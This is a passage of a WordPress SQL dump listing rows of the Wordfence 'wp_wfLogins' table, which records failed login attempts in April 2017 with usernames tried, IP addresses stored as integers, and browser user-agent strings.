(98784, 1492167560.009072, 1, 'loginFailValidUsername', 'julie', 2, 633041094, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(98783, 1492167415.489189, 1, 'loginFailInvalidUsername', 'test', 0, 1039602305, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98782, 1492167413.997964, 1, 'loginFailInvalidUsername', 'test', 0, 1039602305, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98781, 1492164582.532646, 1, 'loginFailInvalidUsername', 'test', 0, 1312794843, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98780, 1492160412.874154, 1, 'loginFailInvalidUsername', 'test', 0, 783306918, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98779, 1492160411.787543, 1, 'loginFailInvalidUsername', 'test', 0, 783306918, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98778, 1492155817.705691, 1, 'loginFailInvalidUsername', 'test', 0, 1564920793, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98777, 1492155816.554519, 1, 'loginFailInvalidUsername', 'test', 0, 1564920793, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98776, 1492148268.001029, 1, 'loginFailInvalidUsername', 'test', 0, 3184961325, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98775, 1492148266.664299, 1, 'loginFailInvalidUsername', 'test', 0, 3184961325, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98774, 1492145540.153014, 1, 'loginFailInvalidUsername', 'test', 0, 698235021, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98773, 1492145538.833866, 1, 'loginFailInvalidUsername', 'test', 0, 698235021, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98772, 1492144971.355227, 1, 'loginFailInvalidUsername', 'test', 0, 1430929736, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98771, 1492144970.304125, 1, 'loginFailInvalidUsername', 'test', 0, 1430929736, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `wp_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(98770, 1492144915.910124, 1, 'loginFailInvalidUsername', 'test', 0, 3393065050, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98769, 1492134517.093906, 1, 'loginFailInvalidUsername', 'test', 0, 3153760673, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98768, 1492132585.288795, 1, 'loginFailInvalidUsername', 'test', 0, 3171175055, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98767, 1492132567.929758, 1, 'loginFailInvalidUsername', 'test', 0, 1534241720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98766, 1492131983.976174, 1, 'loginFailInvalidUsername', 'test', 0, 1768890868, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98765, 1492126118.936569, 1, 'loginFailInvalidUsername', 'test', 0, 1731167281, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98764, 1492122825.061357, 1, 'loginFailInvalidUsername', 'test', 0, 3159373275, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98763, 1492116361.422038, 1, 'loginFailInvalidUsername', 'test', 0, 1893182448, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98762, 1492116359.762756, 1, 'loginFailInvalidUsername', 'test', 0, 1893182448, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98761, 1492114280.900546, 1, 'loginFailInvalidUsername', 'test', 0, 1326665543, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98760, 1492114279.712316, 1, 'loginFailInvalidUsername', 'test', 0, 1326665543, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98759, 1492111093.339057, 1, 'loginFailInvalidUsername', 'test', 0, 688738866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98758, 1492111052.481838, 1, 'loginFailInvalidUsername', 'test', 0, 1365262172, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98757, 1492111051.506695, 1, 'loginFailInvalidUsername', 'test', 0, 1365262172, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98756, 1492110466.287582, 1, 'loginFailInvalidUsername', 'test', 0, 3169684338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98755, 1492110465.267994, 1, 'loginFailInvalidUsername', 'test', 0, 3169684338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98754, 1492108332.626267, 1, 'loginFailValidUsername', 'julie', 2, 1565317613, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),
(98753, 1492108332.625353, 1, 'loginFailValidUsername', 'pablo', 3, 1565317613, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),
(98752, 1492108218.857468, 1, 'loginFailValidUsername', 'pablo', 3, 2997180598, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),
(98751, 1492108218.215742, 1, 'loginFailValidUsername', 'julie', 2, 2997180598, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),
(98750, 1492107837.075454, 1, 'loginFailInvalidUsername', 'test', 0, 1538301742, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98749, 1492107835.635779, 1, 'loginFailInvalidUsername', 'test', 0, 1538301742, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98748, 1492103587.728012, 1, 'loginFailInvalidUsername', 'test', 0, 1561078904, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98747, 1492103586.125988, 1, 'loginFailInvalidUsername', 'test', 0, 1561078904, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98746, 1492102825.871580, 1, 'loginFailInvalidUsername', 'test', 0, 1569564619, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98745, 1492102824.884599, 1, 'loginFailInvalidUsername', 'test', 0, 1569564619, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98744, 1492098343.523968, 1, 'loginFailInvalidUsername', 'test', 0, 3393078506, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98743, 1492098341.924353, 1, 'loginFailInvalidUsername', 'test', 0, 3393078506, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98742, 1492095359.844239, 1, 'loginFailInvalidUsername', 'test', 0, 1336938262, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98741, 1492095358.661224, 1, 'loginFailInvalidUsername', 'test', 0, 1336938262, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98740, 1492088316.684087, 1, 'loginFailInvalidUsername', 'test', 0, 1572527283, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98739, 1492088315.564417, 1, 'loginFailInvalidUsername', 'test', 0, 1572527283, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98738, 1492087800.308321, 1, 'loginFailInvalidUsername', 'test', 0, 609459476, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98737, 1492087796.909211, 1, 'loginFailInvalidUsername', 'test', 0, 609459476, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98736, 1492081343.382184, 1, 'loginFailInvalidUsername', 'test', 0, 704272349, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98735, 1492078023.978951, 1, 'loginFailInvalidUsername', 'test', 0, 2537483960, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98734, 1492078022.598375, 1, 'loginFailInvalidUsername', 'test', 0, 2537483960, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98733, 1492077320.069033, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98732, 1492077319.750621, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98731, 1492077319.429670, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98730, 1492077319.112995, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98729, 1492077318.713658, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98728, 1492077318.372024, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98727, 1492077318.055369, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98726, 1492077317.713935, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98725, 1492077317.397048, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98724, 1492077317.079885, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98723, 1492077316.749907, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98722, 1492077316.432160, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98721, 1492077316.115320, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98720, 1492077315.797914, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98719, 1492077315.469115, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98718, 1492077315.143902, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98717, 1492077314.823360, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98716, 1492077314.506631, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98715, 1492077314.184619, 1, 'loginFailValidUsername', 'admin', 1, 1210059408, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98714, 1492072432.550064, 1, 'loginFailInvalidUsername', 'test', 0, 453423111, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98713, 1492072431.275737, 1, 'loginFailInvalidUsername', 'test', 0, 453423111, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98712, 1492072401.383004, 1, 'loginFailInvalidUsername', 'test', 0, 2079106212, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98711, 1492072397.714304, 1, 'loginFailInvalidUsername', 'test', 0, 2079106212, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98710, 1492069063.186357, 1, 'loginFailInvalidUsername', 'test', 0, 1733826562, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98709, 1492069061.414712, 1, 'loginFailInvalidUsername', 'test', 0, 1733826562, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98708, 1492065841.169643, 1, 'loginFailInvalidUsername', 'test', 0, 3302427236, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98707, 1492065839.461867, 1, 'loginFailInvalidUsername', 'test', 0, 3302427236, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98706, 1492064624.001340, 1, 'loginFailInvalidUsername', 'test', 0, 3127732489, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98705, 1492064372.863222, 1, 'loginFailInvalidUsername', 'test', 0, 1463863771, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98704, 1492064371.865361, 1, 'loginFailInvalidUsername', 'test', 0, 1463863771, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98703, 1492059995.906677, 1, 'loginFailInvalidUsername', 'test', 0, 1333900890, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98702, 1492059994.785119, 1, 'loginFailInvalidUsername', 'test', 0, 1333900890, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98701, 1492054150.885917, 1, 'loginFailInvalidUsername', 'test', 0, 2058432850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98700, 1492054149.602239, 1, 'loginFailInvalidUsername', 'test', 0, 2058432850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98699, 1492053936.265342, 1, 'loginFailInvalidUsername', 'test', 0, 1892216991, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98698, 1492053934.541919, 1, 'loginFailInvalidUsername', 'test', 0, 1892216991, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98697, 1492048177.381845, 1, 'loginFailInvalidUsername', 'test', 0, 3287640228, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98696, 1492048176.438707, 1, 'loginFailInvalidUsername', 'test', 0, 3287640228, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98695, 1492044113.906701, 1, 'loginFailInvalidUsername', 'test', 0, 411903542, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98694, 1492044112.680643, 1, 'loginFailInvalidUsername', 'test', 0, 411903542, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98693, 1492042112.018423, 1, 'loginFailInvalidUsername', 'test', 0, 1502039210, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98692, 1492040807.300532, 1, 'loginFailInvalidUsername', 'test', 0, 3484324916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98691, 1492040805.872525, 1, 'loginFailInvalidUsername', 'test', 0, 3484324916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98690, 1492036821.989714, 1, 'loginFailInvalidUsername', 'test', 0, 1731245353, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98689, 1492036820.359239, 1, 'loginFailInvalidUsername', 'test', 0, 1731245353, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98688, 1492033040.580603, 1, 'loginFailInvalidUsername', 'test', 0, 694506395, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98687, 1492033038.768529, 1, 'loginFailInvalidUsername', 'test', 0, 694506395, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98686, 1492028175.781766, 1, 'loginFailInvalidUsername', 'test', 0, 2954991853, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98685, 1492023371.248203, 1, 'loginFailInvalidUsername', 'test', 0, 3017106923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98684, 1492023369.496797, 1, 'loginFailInvalidUsername', 'test', 0, 3017106923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98683, 1492016362.678834, 1, 'loginFailInvalidUsername', 'test', 0, 1840340872, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98682, 1492016361.497917, 1, 'loginFailInvalidUsername', 'test', 0, 1840340872, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98681, 1492014058.078281, 1, 'loginFailInvalidUsername', 'test', 0, 1549883569, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98680, 1492014056.757940, 1, 'loginFailInvalidUsername', 'test', 0, 1549883569, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98679, 1492013729.219994, 1, 'loginFailInvalidUsername', 'test', 0, 1328455933, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98678, 1492013728.069786, 1, 'loginFailInvalidUsername', 'test', 0, 1328455933, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98677, 1492013686.558425, 1, 'loginFailValidUsername', 'pablo', 3, 2997180598, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),
(98676, 1492013685.815835, 1, 'loginFailValidUsername', 'julie', 2, 2997180598, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),
(98675, 1492012915.745832, 1, 'loginFailInvalidUsername', 'test', 0, 1849894389, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98674, 1492012913.902005, 1, 'loginFailInvalidUsername', 'test', 0, 1849894389, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98673, 1492012015.655846, 1, 'loginFailInvalidUsername', 'test', 0, 1729119501, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98672, 1492012014.334790, 1, 'loginFailInvalidUsername', 'test', 0, 1729119501, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98671, 1492007166.113781, 1, 'loginFailInvalidUsername', 'test', 0, 3319909429, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98670, 1492007163.507706, 1, 'loginFailInvalidUsername', 'test', 0, 3319909429, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98669, 1492006626.974373, 1, 'loginFailInvalidUsername', 'test', 0, 657611280, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98668, 1492006625.616287, 1, 'loginFailInvalidUsername', 'test', 0, 657611280, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98666, 1492006242.084661, 1, 'loginFailInvalidUsername', 'test', 0, 1855938838, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98667, 1492006243.822571, 1, 'loginFailInvalidUsername', 'test', 0, 1855938838, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98665, 1492001789.413154, 1, 'loginFailInvalidUsername', 'test', 0, 2983019920, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98664, 1492001787.951039, 1, 'loginFailInvalidUsername', 'test', 0, 2983019920, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98663, 1491998908.888719, 1, 'loginFailInvalidUsername', 'test', 0, 2036512991, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98661, 1491995118.169022, 1, 'loginFailInvalidUsername', 'test', 0, 2872932992, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98662, 1491995119.576717, 1, 'loginFailInvalidUsername', 'test', 0, 2872932992, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98660, 1491992270.184735, 1, 'loginFailInvalidUsername', 'test', 0, 1602695291, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98659, 1491991975.725748, 1, 'loginFailInvalidUsername', 'test', 0, 1487682955, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98658, 1491985215.658802, 1, 'loginFailInvalidUsername', 'test', 0, 3643263381, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98656, 1491983205.232316, 1, 'loginFailInvalidUsername', 'test', 0, 1371068180, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98657, 1491985214.609746, 1, 'loginFailInvalidUsername', 'test', 0, 3643263381, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98655, 1491983204.146561, 1, 'loginFailInvalidUsername', 'test', 0, 1371068180, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98654, 1491982404.454452, 1, 'loginFailInvalidUsername', 'test', 0, 737502761, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98653, 1491982403.174224, 1, 'loginFailInvalidUsername', 'test', 0, 737502761, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98651, 1491979543.716917, 1, 'loginFailInvalidUsername', 'test', 0, 1300103706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98652, 1491979545.200007, 1, 'loginFailInvalidUsername', 'test', 0, 1300103706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98650, 1491977824.120166, 1, 'loginFailInvalidUsername', 'test', 0, 835614709, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98649, 1491977822.662720, 1, 'loginFailInvalidUsername', 'test', 0, 835614709, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98648, 1491976556.711560, 1, 'loginFailInvalidUsername', 'test', 0, 1546912603, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98647, 1491976555.647956, 1, 'loginFailInvalidUsername', 'test', 0, 1546912603, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98646, 1491974046.595878, 1, 'loginFailInvalidUsername', 'test', 0, 694240377, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98645, 1491974019.180787, 1, 'loginFailValidUsername', 'admin', 1, 3308123913, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(98644, 1491967095.725861, 1, 'loginFailInvalidUsername', 'test', 0, 800631730, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98643, 1491967094.317901, 1, 'loginFailInvalidUsername', 'test', 0, 800631730, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98642, 1491965790.243044, 1, 'loginFailInvalidUsername', 'test', 0, 2320229452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98641, 1491965788.678242, 1, 'loginFailInvalidUsername', 'test', 0, 2320229452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98640, 1491958505.350334, 1, 'loginFailInvalidUsername', 'test', 0, 3389449650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98639, 1491958503.501071, 1, 'loginFailInvalidUsername', 'test', 0, 3389449650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98638, 1491958190.113282, 1, 'loginFailInvalidUsername', 'test', 0, 3320681808, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98637, 1491958188.681741, 1, 'loginFailInvalidUsername', 'test', 0, 3320681808, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98636, 1491956342.263369, 1, 'loginFailValidUsername', 'julie', 2, 2513075873, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(98635, 1491955422.403837, 1, 'loginFailInvalidUsername', 'test', 0, 1564673684, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
